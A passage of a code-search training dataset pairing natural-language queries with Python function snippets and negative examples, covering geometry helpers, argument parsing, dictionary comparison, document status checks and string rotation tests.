"def get_pair(value=None, val_1_default=None, val2_default=None, name=\"value\"):\n if value is None:\n return val_1_default, val2_default\n if isinstance(value, type(0.0)) or isinstance(value, type(0)):\n return value, value\n elif isinstance(value, type(())) or isinstance(value, type([])):\n if len(value) == 2:\n return value\n else:\n raise ValueError(name + \" requires a tuple of length 2\")",
"def nearest_neighbours(nodes, center, radius):\n nodes = np.asarray(nodes)\n d = cartesian_distance(nodes, center)\n nearest_nodes = nodes[d < radius]\n return tuple(map(tuple, nearest_nodes))",
"def parse_credentials(username: str, password: str) -> tuple:\n return username, password",
"def circle_insec(self, p1, r1, p2, r2):\r\n x = p1[0]\r\n y = p1[1]\r\n R = r1\r\n a = p2[0]\r\n b = p2[1]\r\n S = r2\r\n d = math.sqrt((abs(a - x)) ** 2 + (abs(b - y)) ** 2)\r\n if d > (R + S) or d < (abs(R - S)):\r\n print(\"Two circles have no intersection\")\r\n return\r\n elif d == 0 and R == S:\r\n print(\"Two circles have same center!\")\r\n return\r\n else:\r\n A = (R ** 2 - S ** 2 + d ** 2) / (2 * d)\r\n h = math.sqrt(R ** 2 - A ** 2)\r\n x2 = x + A * (a - x) / d\r\n y2 = y + A * (b - y) / d\r\n x3 = round(x2 - h * (b - y) / d, 2)\r\n y3 = round(y2 + h * (a - x) / d, 2)\r\n x4 = round(x2 + h * (b - y) / d, 2)\r\n y4 = round(y2 - h * (a - x) / d, 2)\r\n print(x3, y3)\r\n print(x4, y4)\r\n c1 = np.array([x3, y3])\r\n c2 = np.array([x4, y4])\r\n return c1, c2",
"def __init__(self, radius=2, center=(0, 0)):\n self.radius = radius\n self.circle_center = center\n self.circle_area = self.calculate_area()\n self.circle_perimeter = self.calculate_perimeter()",
"def circle(center=[0,0], r=1.):\n ang = np.linspace(0,2*np.pi,1000)\n #unit circle * radius\n x = np.cos(ang)*r\n y = np.sin(ang)*r\n #circle transloation\n x = x + center[0]\n y = y + center[0]\n return x,y",
"def greatcircle(\n lat1: float,\n lon1: float,\n lat2: float,\n lon2: float,\n *args: Any,\n **kwargs: Any,\n) -> list[tuple[float, float]]:\n geod = Geod(ellps=\"WGS84\")\n return [\n (lat, lon)\n for (lon, lat) in geod.npts(lon1, lat1, lon2, lat2, *args, **kwargs)\n ]",
"def __circle__(center=[0,0], r=1.):\n ang = np.linspace(0,2*np.pi,1000)\n #unit circle * radius\n x = np.cos(ang)*r\n y = np.sin(ang)*r\n #circle transloation\n x = x + center[0]\n y = y + center[0]\n return x,y",
"def parse_arguments(arguments):\n usage = \"%prog [options] SYSTEM HOST NAME MENS_DISTANCE WOMENS_DISTANCE\"\n option_parser = OptionParser(usage)\n option_parser.add_option(\"-u\", \"--username\", default=USERNAME)\n options, arguments = option_parser.parse_args(arguments[1:])\n index = count(0)\n try:\n system = arguments[index.next()]\n host = arguments[index.next()]\n name = arguments[index.next()]\n mens_distance = int(arguments[index.next()])\n womens_distance = int(arguments[index.next()])\n except IndexError:\n option_parser.error(\"Please provide the correct number of positional \"\n \"arguments.\")\n except ValueError, error:\n option_parser.error(error)\n return options, (system, host, name, (mens_distance, womens_distance))",
"def _check_spatial_data(\n uns: Mapping, library_id: Union[str, None, Empty]\n) -> Tuple[Optional[str], Optional[Mapping]]:\n spatial_mapping = uns.get(\"spatial\", {})\n if library_id is _empty:\n if len(spatial_mapping) > 1:\n raise ValueError(\n \"Found multiple possible libraries in `.uns['spatial']. Please specify.\"\n f\" Options are:\\n\\t{list(spatial_mapping.keys())}\"\n )\n elif len(spatial_mapping) == 1:\n library_id = list(spatial_mapping.keys())[0]\n else:\n library_id = None\n if library_id is not None:\n spatial_data = spatial_mapping[library_id]\n else:\n spatial_data = None\n return library_id, spatial_data",
"def parse_point(coords_str):\n x, y = coords_str.split()\n return float(x), float(y)",
"def raletivePosition(pointA, pointB):\n if (type(pointA) == tuple) and (type(pointB) == tuple):\n x = pointA[0] + pointB[0]\n y = pointA[1] + pointB[1]\n return (x, y)\n else:\n print(\"PointA and PointB must be 'tuple'.\")\n raise TypeError",
"def pair_parse(arg, location_dict):\n equal_index = find_equal(arg)\n if equal_index == -1:\n logging.error(\"cannot find [=] in argument [%s] of -xattr\", arg)\n return -1\n\n if equal_index == 0:\n logging.error(\"no name pattern before [=] in argument [%s] of -xattr\", arg)\n return -1\n\n if equal_index == len(arg) - 1:\n logging.error(\"no value pattern after [=] in argument [%s] of -xattr\", arg)\n return -1\n\n name = arg[0:equal_index]\n # Remove the escape \\\\ or \\=\n name = name.replace(\"\\\\\\\\\", \"\\\\\").replace(\"\\\\=\", \"=\")\n if name not in CLOWNFISH_LOCATION_KEYS:\n logging.error(\"invalid key [%s], expected one of %s\",\n name, CLOWNFISH_LOCATION_KEYS)\n return -1\n\n value = arg[equal_index + 1:]\n # Remove the escape \\\\ or \\=\n value = value.replace(\"\\\\\\\\\", \"\\\\\").replace(\"\\\\=\", \"=\")\n location_dict[name] = value\n return 0",
"def _parse_coordinates(self, vars: Dict[str, VariableDefinition]) -> Tuple[Dict[str, VariableDefinition], Dict[str, VariableDefinition]]:\n coords = {name: var for name, var in vars.items() if var.is_coordinate()}\n vars = {name: var for name, var in vars.items() if not var.is_coordinate()}\n return coords, vars",
"def parse_pos_args(args, kwargs, name1, name2, integer=False, others=[]):\n from .position import PositionD, PositionI, _PositionD, _PositionI\n def canindex(arg):\n try: arg[0], arg[1]\n except (TypeError, IndexError): return False\n else: return True\n\n other_vals = []\n if len(args) == 0:\n # Then name1,name2 need to be kwargs\n try:\n x = kwargs.pop(name1)\n y = kwargs.pop(name2)\n except KeyError:\n raise TypeError(\n 'Expecting kwargs %s, %s. Got %s'%(name1, name2, kwargs.keys())) from None\n elif ( ( isinstance(args[0], PositionI) or\n (not integer and isinstance(args[0], PositionD)) ) and\n len(args) <= 1+len(others) ):\n x = args[0].x\n y = args[0].y\n for arg in args[1:]:\n other_vals.append(arg)\n others.pop(0)\n elif canindex(args[0]) and len(args) <= 1+len(others):\n x = args[0][0]\n y = args[0][1]\n for arg in args[1:]:\n other_vals.append(arg)\n others.pop(0)\n elif len(args) == 1:\n if integer:\n raise TypeError(\"Cannot parse argument %s as a PositionI\"%(args[0]))\n else:\n raise TypeError(\"Cannot parse argument %s as a PositionD\"%(args[0]))\n elif len(args) <= 2 + len(others):\n x = args[0]\n y = args[1]\n for arg in args[2:]:\n other_vals.append(arg)\n others.pop(0)\n else:\n raise TypeError(\"Too many arguments supplied\")\n # Read any remaining other kwargs\n if others:\n for name in others:\n val = kwargs.pop(name)\n other_vals.append(val)\n if kwargs:\n raise TypeError(\"Received unexpected keyword arguments: %s\",kwargs)\n\n if integer:\n pos = _PositionI(int(x),int(y))\n else:\n pos = _PositionD(float(x),float(y))\n if other_vals:\n return (pos,) + tuple(other_vals)\n else:\n return pos"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Ensures valid `docstatus` transition.
|
def allow_transition_from_0_to_2(self, docstatus):
if self.docstatus > 2:
frappe.throw(_('This document is currently queued for execution. Please try again'),
title=_('Document Queued'), indicator='red')
if not self.docstatus:
self.docstatus = 0
if docstatus==0:
if self.docstatus==0:
self._action = "save"
elif self.docstatus==1:
self._action = "submit"
self.check_permission("submit")
#else:
# raise frappe.DocstatusTransitionError, _("Cannot change docstatus from 0 to 2")
elif docstatus==1:
if self.docstatus==1:
self._action = "update_after_submit"
self.check_permission("submit")
elif self.docstatus==2:
self._action = "cancel"
self.check_permission("cancel")
else:
raise frappe.DocstatusTransitionError, _("Cannot change docstatus from 1 to 0")
elif docstatus==2:
raise frappe.ValidationError, _("Cannot edit cancelled document")
|
[
"def assert_valid_status_transition(cls, old_status: str, new_status: str):\n for status in (old_status, new_status):\n cls.assert_valid_status(status)\n\n # Status can never transition to NEW.\n # All other transitions are valid, at least for now.\n if not (old_status == cls.NEW or new_status != cls.NEW):\n raise ValueError(\"Invalid bookmark status transition '{0}' -> '{1}'\".format(old_status, new_status))",
"def assert_valid_original_status(cls, status: str):\n if status not in cls.VALID_ORIGINAL_STATUSES:\n raise ValueError(\"Invalid bookmark status for new bookmark '{0}'; must be {1}\".format(\n status, ' or '.join([\"'{}'\".format(s) for s in cls.VALID_ORIGINAL_STATUSES])))",
"def _status_setter_checks(self):\n if self.check_status((\"public\", )):\n raise QiitaDBStatusError(\"Illegal operation on public collection!\")",
"def assert_valid_status(cls, status: str):\n if status not in cls.VALID_STATUSES:\n raise ValueError(\"Invalid bookmark status '{0}'; must be one of {1}\".format(\n status, ', '.join([\"'{}'\".format(s) for s in cls.VALID_STATUSES])))",
"def _status_setter_checks(self):\n if self.check_status({\"public\"}):\n raise QiitaDBStatusError(\"Can't set status away from public!\")",
"def is_valid(document_id):\n pass",
"def test_gov_sees_no_drafts(self):\n # View the organization that fs_user_1 belongs to\n response = self.clients['gov_analyst'].get(\n \"/api/documents\"\n )\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n response_data = json.loads(response.content.decode(\"utf-8\"))\n\n for doc in response_data:\n self.assertNotEqual(doc['status']['status'],\n 'Draft')",
"def _check_draft_status(func):\n def wrapper(self, *args, **kwargs):\n if self.status != Status.DRAFT:\n msg = '{} is not in Draft status. Please clone first to modify'.format(self)\n logger.error(msg)\n raise RuntimeError(msg)\n return func(self, *args, **kwargs)\n return wrapper",
"def validate_possible_transitions(cls, rs_model: RoutingSlipModel,\n future_status: RoutingSlipStatus):\n allowed_statuses = RoutingSlipStatusTransitionService.get_possible_transitions(rs_model)\n if future_status not in allowed_statuses:\n raise BusinessException(Error.FAS_INVALID_RS_STATUS_CHANGE)",
"def is_valid(cls, status):\n\n return status == cls.WORKING or status == cls.PUBLISHED or status == cls.ALL",
"def ensure_valid(self):\n self.op_info.ensure_valid()",
"def _validate_status(self, vpn_service, ipsec_site_conn, final_status):\n\n assert(final_status == vpn_service['vpnservice']['status']), (\n \"VPN SERVICE IS NOT IN %s STATE\" % final_status)\n assert(final_status == ipsec_site_conn['ipsec_site_connection']\n ['status']), (\"THE IPSEC SITE CONNECTION IS NOT IN %s STATE\"\n % final_status)",
"def test_invalid_change_doc_id():\n statement = copy.deepcopy(CHANGE_STATEMENT)\n del statement['baseDebtor']\n statement['documentId'] = '00123456789'\n\n is_valid, errors = validate(statement, 'changeStatement', 'ppr')\n\n if errors:\n for err in errors:\n print(err.message)\n print(errors)\n\n assert not is_valid",
"def test_cannot_complete_proposition_without_ongoing_status(self, proposition_status):\n user = create_test_user(\n permission_codenames=(\n PropositionPermission.change_all,\n ),\n dit_team=TeamFactory(),\n )\n proposition = PropositionFactory(\n status=proposition_status,\n )\n entity_document = PropositionDocument.objects.create(\n proposition_id=proposition.pk,\n original_filename='test.txt',\n created_by=user,\n )\n entity_document.document.mark_as_scanned(True, '')\n url = reverse(\n 'api-v3:investment:proposition:complete',\n kwargs={\n 'proposition_pk': proposition.pk,\n 'project_pk': proposition.investment_project.pk,\n },\n )\n api_client = self.create_api_client(user=user)\n response = api_client.post(url)\n response_data = response.json()\n assert response.status_code == status.HTTP_409_CONFLICT\n detail = f'The action cannot be performed in the current status {proposition_status}.'\n assert response_data['detail'] == detail\n\n proposition.refresh_from_db()\n assert proposition.status == proposition_status\n assert proposition.details == ''",
"def test_counting_unready_docs(self):\n # Make a doc with an approved but not-ready-for-l10n rev:\n d = DocumentFactory(is_localizable=True)\n r = ApprovedRevisionFactory(document=d, is_ready_for_localization=False)\n\n # It shouldn't show up in the total:\n self.assertEqual(0, l10n_overview_rows(\"de\")[\"all\"][\"denominator\"])\n\n r.is_ready_for_localization = True\n r.save()\n self.assertEqual(1, l10n_overview_rows(\"de\")[\"all\"][\"denominator\"])",
"def notCurable(self):\n self.pkmn.setStatus(self.status)\n self.delegate2.checkCurable(self.pkmn)\n \n assert self.pkmn.getStatus() == self.status, \"Status should not be cured\"",
"def test_change_status_missing_parameter(self):\n self.login()\n\n created_todo = create_todo()\n todo_id = created_todo.id\n pristine_status = created_todo.mark_completed\n\n response = self.client.post(url_for('alaya_todo.todo_change_status'))\n\n self.assert200(response)\n\n response_dict = json.loads(response.data)\n\n # Checking the expected values in the response\n self.assertFalse(response_dict['success'], 'The success key must be False')\n self.assertEqual(response_dict['status'], 400, 'The status key must be 400.')\n self.assertEqual(response_dict['message'], 'The identifier of the task is required to update the status.',\n 'The response messages must math.')\n\n # Checking the database changes\n updated_todo = load_todo(todo_id)\n self.assertEqual(pristine_status, updated_todo.mark_completed, 'The mark_completed properties must match.')\n\n delete_todo(todo_id)\n\n self.logout()",
"def test_catch_correctable_error_set_status(self):\n record = MobileNumber(None, '27345678901')\n assert record.status != 'corrected'\n record.catch_correctable_error()\n self.assertEqual(record.status, 'corrected')",
"def validate_agreement_document(self, operation):\n if self.request.validated['tender_status'] not in ['active.qualification', 'active.awarded']:\n raise_operation_error(\n self.request, 'Can\\'t {} document in current ({}) tender status'.format(\n operation, self.request.validated['tender_status']))\n if any([i.status != 'active'\n for i in self.request.validated['tender'].lots\n if i.id in [a.lotID\n for a in self.request.validated['tender'].awards\n if a.id in self.request.validated['agreement'].get_awards_id()]]):\n raise_operation_error(self.request, 'Can {} document only in active lot status'.format(operation))\n if self.request.validated['agreement'].status not in ['pending', 'active']:\n raise_operation_error(self.request, 'Can\\'t {} document in current agreement status'.format(operation))\n if any([any([c.status == 'accepted' for c in i.complaints])\n for i in self.request.validated['tender'].awards\n if i.lotID in [a.lotID\n for a in self.request.validated['tender'].awards\n if a.id in self.request.validated['agreement'].get_awards_id()]]):\n raise_operation_error(self.request, 'Can\\'t {} document with accepted complaint')\n return True",
"def test_put_invalid_local_doc(self):\n self.put_document_variants('_local', Expect.VALIDATION_EXCEPTION_DOCID.value)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Test string rotation returns false.
|
def test_string_rotration_false():
from string_rotation import string_rotation
assert string_rotation('hello', 'nothello') is False
|
[
"def test_string_rotation_true():\n from string_rotation import string_rotation\n assert string_rotation('hello', 'elloh') is True",
"def string_rotation(str1, str2):\n if len(str1) == len(str2):\n return is_substring(str1+str1, str2)\n return False",
"def IsRotation(a,b):\n\trotation = 0\n\trotate_max = len(a)\n\n\twhile rotation < rotate_max:\n\t\trotation += 1\n\n\t\tif a == b:\n\t\t\treturn True\n\n\t\ta = a[-1] + a[:-1]\n\n\treturn False",
"def rotateString(self, A: str, B: str) -> bool:\n return len(A) == len(B) and B in A + A",
"def valid_rotation(self, rot):\n # Is this a valid rotation?\n if not rot in Rotation:\n if self.verbose: print(f\"Invalid rot {rot}, must be a Rotation.\") \n return False \n\n return True",
"def rotateString(self, A: str, B: str) -> bool:\n # Concatenate A with itself and then search for B\n return len(A) == len(B) and B in (A + A)",
"def check_rotation(raster_one, raster_two):\n test = (raster_one.rotone == raster_two.rotone) and \\\n (raster_one.rottwo == raster_two.rottwo)\n return test",
"def is_rotated(array_1, array_2):\n if len(array_1) != len(array_2):\n return False\n if array_1 == array_2:\n return True\n if set(array_1) != set(array_2):\n return False\n index = array_1.index(array_2[0])\n return (array_2 == (array_1[index:] + array_1[:index]))",
"def is_orientation_legal(self, newrot, newmir):\n if self.has_vdd and newrot != 0:\n return False\n if self.has_gnd and newrot != 2:\n return False\n return True",
"def test_rotate_90_right(self):\n self.rover.rotate_90_right()\n self.assertEqual(self.rover.cardinalPoint, 'S'), \"should be S\"",
"def is_tandem(seq: str) -> bool:\n L = len(seq)\n for i in range(1, -(-L // 2) + 1):\n if L % i == 0 and seq == seq[:i] * (L // i):\n return True\n return False",
"def fromString(self, str: 'SbString') -> \"SbBool\":\n return _coin.SbRotation_fromString(self, str)",
"def reference_is_rotated(self):\n if (\n np.allclose(self.axis_u, (1, 0, 0))\n and np.allclose(self.axis_v, (0, 1, 0))\n and np.allclose(self.axis_w, (0, 0, 1))\n ):\n return False\n return True",
"def is_mirror(s):\n new = s[:(len(s)//2)]\n if (mirror(new)==s):\n return True\n return False",
"def test_RotatE():\n testing_function('rotate')",
"def test_encrypt_lowercase():\n output = rot13.encrypt(\"abc\")\n assert output == \"nop\"",
"def motor_rotating(self):\n self.write_line('MOTOR:ROTATE?')\n rotation_text = self.read_line()\n rotation = bool(int(rotation_text))\n return rotation",
"def is_permutation_v3(string1, string2):\n\n\tstring1_dict = str_count_dict(string1)\n\n\tfor c in string2:\n\t\tif c in string1_dict:\n\t\t\tstring1_dict[c] -= 1\n\t\telse:\n\t\t\treturn False\n\n\tfor char, count in string1_dict.iteritems():\n\t\tif count != 0:\n\t\t\treturn False\n\n\treturn True",
"def test_encrypt_uppercase():\n output = rot13.encrypt(\"ABC\")\n assert output == \"NOP\""
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Test string rotation returns true.
|
def test_string_rotation_true():
from string_rotation import string_rotation
assert string_rotation('hello', 'elloh') is True
|
[
"def test_string_rotration_false():\n from string_rotation import string_rotation\n assert string_rotation('hello', 'nothello') is False",
"def string_rotation(str1, str2):\n if len(str1) == len(str2):\n return is_substring(str1+str1, str2)\n return False",
"def IsRotation(a,b):\n\trotation = 0\n\trotate_max = len(a)\n\n\twhile rotation < rotate_max:\n\t\trotation += 1\n\n\t\tif a == b:\n\t\t\treturn True\n\n\t\ta = a[-1] + a[:-1]\n\n\treturn False",
"def rotateString(self, A: str, B: str) -> bool:\n return len(A) == len(B) and B in A + A",
"def rotateString(self, A: str, B: str) -> bool:\n # Concatenate A with itself and then search for B\n return len(A) == len(B) and B in (A + A)",
"def valid_rotation(self, rot):\n # Is this a valid rotation?\n if not rot in Rotation:\n if self.verbose: print(f\"Invalid rot {rot}, must be a Rotation.\") \n return False \n\n return True",
"def check_rotation(raster_one, raster_two):\n test = (raster_one.rotone == raster_two.rotone) and \\\n (raster_one.rottwo == raster_two.rottwo)\n return test",
"def test_rotate_90_right(self):\n self.rover.rotate_90_right()\n self.assertEqual(self.rover.cardinalPoint, 'S'), \"should be S\"",
"def is_rotated(array_1, array_2):\n if len(array_1) != len(array_2):\n return False\n if array_1 == array_2:\n return True\n if set(array_1) != set(array_2):\n return False\n index = array_1.index(array_2[0])\n return (array_2 == (array_1[index:] + array_1[:index]))",
"def fromString(self, str: 'SbString') -> \"SbBool\":\n return _coin.SbRotation_fromString(self, str)",
"def test_encrypt_lowercase():\n output = rot13.encrypt(\"abc\")\n assert output == \"nop\"",
"def motor_rotating(self):\n self.write_line('MOTOR:ROTATE?')\n rotation_text = self.read_line()\n rotation = bool(int(rotation_text))\n return rotation",
"def test_RotatE():\n testing_function('rotate')",
"def reference_is_rotated(self):\n if (\n np.allclose(self.axis_u, (1, 0, 0))\n and np.allclose(self.axis_v, (0, 1, 0))\n and np.allclose(self.axis_w, (0, 0, 1))\n ):\n return False\n return True",
"def test_encrypt_uppercase():\n output = rot13.encrypt(\"ABC\")\n assert output == \"NOP\"",
"def test_generate_rotation_rotor_and_angle(self):\n from clifford.tools.g3 import generate_rotation_rotor, random_unit_vector, angle_between_vectors\n\n euc_vector_m = random_unit_vector()\n euc_vector_n = random_unit_vector()\n theta = angle_between_vectors(euc_vector_m, euc_vector_n)\n print(theta)\n\n rot_rotor = generate_rotation_rotor(theta, euc_vector_m, euc_vector_n)\n v1 = euc_vector_m\n v2 = rot_rotor*euc_vector_m*~rot_rotor\n theta_return = angle_between_vectors(v1, v2)\n print(theta_return)\n\n testing.assert_almost_equal(theta_return, theta)\n testing.assert_almost_equal(euc_vector_n.value, v2.value)",
"def test_rotate_pdfrw_90(self):\n rotation = 90\n rotated = Rotate(self.pdf_path, rotation, suffix='rotated_pdfrw', tempdir=self.temp.name, method='pdfrw').file\n\n # Assert rotated pdf file exists\n self.assertTrue(os.path.isfile(rotated))\n\n # Assert pdf file was rotated by the correct amount of degrees\n self.assertEqual(Info(rotated).rotate, rotation)\n return rotated",
"def test_change_orientation_S(self):\n\t\torientation = 'E'\n\t\tspin = 'R'\n\t\tres = marsRover.changeOrientation(orientation, spin)\n\t\tself.assertEqual(res, 'S')",
"def test_rotate_90_left(self):\n self.rover.rotate_90_left()\n self.assertEqual(self.rover.cardinalPoint, 'N'), \"should be N\""
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Compare dict1 keys with dict2 keys and see if dict1 has extra keys compared to dict2
|
def compare_dict_keys(dict1, dict2):
return dict1.keys() - dict2.keys()
|
[
"def cmp_dict(d1, d2, ignore_keys=[]):\n # https://stackoverflow.com/questions/10480806/compare-dictionaries-ignoring-specific-keys\n return {k: v for k, v in d1.items() if k not in ignore_keys} \\\n == {k: v for k, v in d2.items() if k not in ignore_keys}",
"def compare_dicts_structure(dict1, dict2):\n return sorted(describe_dict(dict1)) == sorted(describe_dict(dict2))",
"def detect_change(first: Dict[str, str], second: Dict[str, str],\n compareKeys: [str]) -> bool:\n for key in compareKeys:\n if key not in second or key not in first:\n return True\n if first[key] != second[key]:\n return True\n return False",
"def cmp_dicts(d1, d2):\n # First test the keys\n for k1 in d1.keys():\n if k1 not in d2:\n return False\n for k2 in d2.keys():\n if k2 not in d1:\n return False\n # Now we need to test the contents recursively. We store the results of\n # each recursive comparison in a list and assert that they all must be True\n # at the end\n comps = []\n for k1, v1 in d1.items():\n v2 = d2[k1]\n if isinstance(v1, dict) and isinstance(v2, dict):\n comps.append(cmp_dicts(v1, v2))\n else:\n if v1 != v2:\n return False\n return all(comps)",
"def compareKeys(currDict, formerDict):\n diff = {}\n for key in currDict:\n if currDict.get(key) != formerDict.get(key):\n diff[key] = currDict.get(key)\n return diff",
"def _dict_is_part_of(dict_a, dict_b):\n dict_a, dict_b = CaseInsensitiveDict(dict_a), CaseInsensitiveDict(dict_b)\n for key, value in dict_b.items():\n if key not in dict_a or dict_a[key] != value:\n return False\n return True",
"def check_fields(dict1, dict2):\n for key, value in dict1.items():\n if isinstance(value, dict):\n if not isinstance(dict2.get(key), dict):\n return False\n check_fields(value, dict2.get(key))\n elif value != dict2.get(key):\n return False\n return True",
"def recursive_compare_dicts(d1, d2):\n nt.assert_equal(set(d1.keys()), set(d2.keys()))\n for key in d1:\n if isinstance(d1[key], (list)):\n try:\n nt.assert_list_equal(d1[key], list(d2[key]))\n except (AssertionError, TypeError) as err:\n print('d1:', key, 'key value type:', type(d1[key]),\n 'data type:', type(d1[key][0]), d1[key])\n print('d2:', key, 'key value type', type(d1[key]),\n 'data type:', type(d2[key][0]), d2[key])\n raise err\n elif isinstance(d1[key], (np.ndarray)):\n if np.issubdtype(d1[key].dtype, np.string_):\n nt.assert_true(np.array_equal(d1[key], np.asarray(d2[key])))\n else:\n try:\n nt.assert_true(np.allclose(d1[key], np.asarray(d2[key])))\n except (AssertionError, TypeError) as err:\n print('d1:', key, 'key value type:', type(d1[key]),\n 'data type:', type(d1[key][0]), d1[key])\n print('d2:', key, 'key value type', type(d1[key]),\n 'data type:', type(d2[key][0]), d2[key])\n raise err\n elif isinstance(d1[key], dict):\n recursive_compare_dicts(d1[key], d2[key])\n elif isinstance(d1[key], (float, np.float, np.float32)):\n nt.assert_true(np.allclose(d1[key], d2[key]))\n else:\n nt.assert_equal(d1[key], d2[key])",
"def _assert_dict_eq(a, b):\n err = 1e-5\n for k in set(a.keys()).union(set(b.keys())):\n if a[k] == b[k]:\n continue\n try:\n if abs(a[k] - b[k]) > err:\n raise AssertionError(f\"{k}: {a[k]} != {b[k]}\")\n except TypeError: # can't take abs, nan\n raise AssertionError(f\"{a[k]} != {b[k]}\")",
"def is_subdict(json1, json2, desc1=\"json1\", desc2=\"json2\", verbose=True):\n\n def out(x):\n if verbose:\n PRINT(x)\n\n def sorted_set_repr(x):\n return f\"{{{repr(sorted(x))[1:-1]}}}\"\n\n def recurse(json1, json2, path=\"\"):\n if isinstance(json1, dict) and isinstance(json2, dict):\n k1 = set(json1.keys())\n k2 = set(json2.keys())\n result = k1 <= k2\n if result:\n if k1 != k2:\n out(f\"Non-fatal keyword mismatch at {path!r}:\")\n out(f\" {desc1} keys: {sorted_set_repr(k1)}\")\n out(f\" {desc2} keys: {sorted_set_repr(k2)}\")\n result = all(recurse(value, json2[key], path=f\"{path}.{key}\")\n for key, value in json1.items())\n if not result:\n # out(f\"Recursive failure at {path!r} in object comparison\")\n pass\n else:\n out(f\"Failed at {path!r} in object comparison due to key set mismatch:\")\n out(f\" {desc1} keys: {sorted_set_repr(k1)}\")\n out(f\" {desc2} keys: {sorted_set_repr(k2)}\")\n elif isinstance(json1, list) and isinstance(json2, list):\n len1 = len(json1)\n len2 = len(json2)\n result = len1 == len2\n if not result:\n out(f\"Failed at {path!r} in list comparison due to length mismatch: {len1} vs {len2}\")\n else:\n result = all(recurse(json1[i], json2[i], path=f\"{path}[{i}]\") for i in range(len1))\n if not result:\n # out(f\"Recursive failure at {path!r} in list comparison\")\n pass\n elif type(json1) == type(json2):\n result = json1 == json2\n if not result:\n out(f\"Failed at {path!r} due to value mismatch: {json.dumps(json1)} != {json.dumps(json2)}\")\n else:\n result = False\n if not result:\n out(f\"Type mismatch ({json1.__class__.__name__} vs {json2.__class__.__name__}) at {path!r}:\")\n out(f\" {desc1}: {json1}\")\n out(f\" {desc2}: {json2}\")\n return result\n return recurse(json1, json2)",
"def dicts_equal(lhs, rhs):\n if len(lhs.keys()) != len(rhs.keys()):\n return False\n\n for key, val in anyconfig.compat.iteritems(rhs):\n val_ref = lhs.get(key, None)\n if val != val_ref:\n return False\n\n return True",
"def dict_diff(d1, d2):\n return DictPatch(\n {k: v for k, v in d2.items() if k not in d1 or d1[k] != v},\n [k for k in d1 if k not in d2],\n )",
"def PrintDictDiff( d1, d2 ):\n\n d1only = [ k1 for k1 in list(d1.keys()) if k1 not in d2 ]\n d2only = [ k2 for k2 in list(d2.keys()) if k2 not in d1 ]\n diffVals = [ k for k in list(d1.keys()) if k in list(d2.keys()) and d1[k] != d2[k] ]\n\n print('d1only=', d1only, ' d2only=', d2only, ' diffVals=', diffVals)",
"def intersection_of_two_dicts(dict1, dict2):\n\t# identify the smaller of the two dictionaries\n\tcheck_dict = None\n\tif len(dict1) < len(dict2):\n\t\tcheck_dict = dict1\n\telse: check_dict = dict2\n\t# find the common elements i.e. a spelling error in both dictdionaries\n\tmy_dict = dict()\n\tfor d1 in dict1:\n\t\tif d1 in dict2:\n\t\t\tmy_dict[d1] = list(set(dict1[d1] + dict2[d1]))\n\treturn my_dict",
"def and_dict(dict1, dict2):\n dict3 = {}\n for key in dict1.keys():\n dict3[key] = dict1[key] & dict2.get(key, False)\n return dict3",
"def confirm_dict_equality(dict1, dict2):\n if dict1 == dict2:\n pass\n else:\n # log this\n request.status_code = 500\n raise VCSManagerError('The built dictionaries are not identical. Yikes.')",
"def delta(dict1,dict2):\n res = {}\n for k,v in dict1.iteritems():\n if k not in dict2:\n res[k] = v\n elif dict2[k] != v:\n if isinstance(dict2[k],dict) and isinstance(v,dict):\n res[k] = delta(v,dict2[k])\n else:\n res[k] = v\n return res",
"def dict_diff(first, second):\n diff = {}\n # Check all keys in first dict\n for key in first.keys():\n if (not second.has_key(key)):\n diff[key] = (first[key], KEYNOTFOUND)\n elif (first[key] != second[key]):\n diff[key] = (first[key], second[key])\n # Check all keys in second dict to find missing\n for key in second.keys():\n if (not first.has_key(key)):\n diff[key] = (KEYNOTFOUND, second[key])\n return diff",
"def assertDictEquals(self, dictionary1, dictionary2, depth=[]):\n d1_keys = dictionary1.keys()\n d1_keys.sort()\n\n d2_keys = dictionary2.keys()\n d2_keys.sort()\n\n self.failUnlessEqual(d1_keys, d2_keys,\n \"Dictionary keys do not match, %s vs %s\" % (\n d1_keys, d2_keys))\n for key, value in dictionary1.items():\n if isinstance(value, collections.Mapping):\n # go recursive\n depth.append(key)\n self.assertDictEquals(value, dictionary2[key], depth)\n else:\n self.failUnlessEqual(value, dictionary2[key],\n \"Dictionary values do not match for key '%s' \"\n \"(%s vs %s) at depth: %s.\\nDictionary 1: %s\\n\"\n \"Dictionary 2: %s\\n\" % (\n key, value, dictionary2[key], \".\".join(depth),\n prettydump(dictionary1), prettydump(dictionary2)))"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Log in as Admin Click on User Menu for dropdown Click on 'Admin' on user menu Click "Stats" Click "Concept Coach" The user is presented with Concept Coach Statistics (t2.07.01) Corresponds to... t2.07.01
|
def test_view_stats_admin(self):
# t2.07.01 --> The user is presented with Concept Coach Statistics
self.admin.login()
self.admin.goto_admin_control()
self.admin.sleep(5)
self.admin.wait.until(
expect.visibility_of_element_located(
(By.PARTIAL_LINK_TEXT, 'Stats')
)
).click()
self.admin.wait.until(
expect.visibility_of_element_located(
(By.PARTIAL_LINK_TEXT, 'Concept Coach')
)
).click()
assert ('/stats/concept_coach' in self.admin.current_url()), \
'Not viewing Concept Coach stats'
|
[
"def test_admin_dashboard_page(self):\n response = self.client.get('/admin/')\n self.assertContains(\n response,\n '<h2>User graph</h2>',\n html=True,\n )\n self.assertContains(\n response,\n '<h2>User logged in graph</h2>',\n html=True,\n )\n self.assertContains(\n response,\n '<svg style=\"width:100%;height:300px;\"></svg>',\n html=True,\n )\n self.assertContains(\n response,\n '<option value=\"true\">Active</option>',\n html=True,\n )\n self.assertContains(\n response,\n '<option value=\"false\">Inactive</option>',\n html=True,\n )",
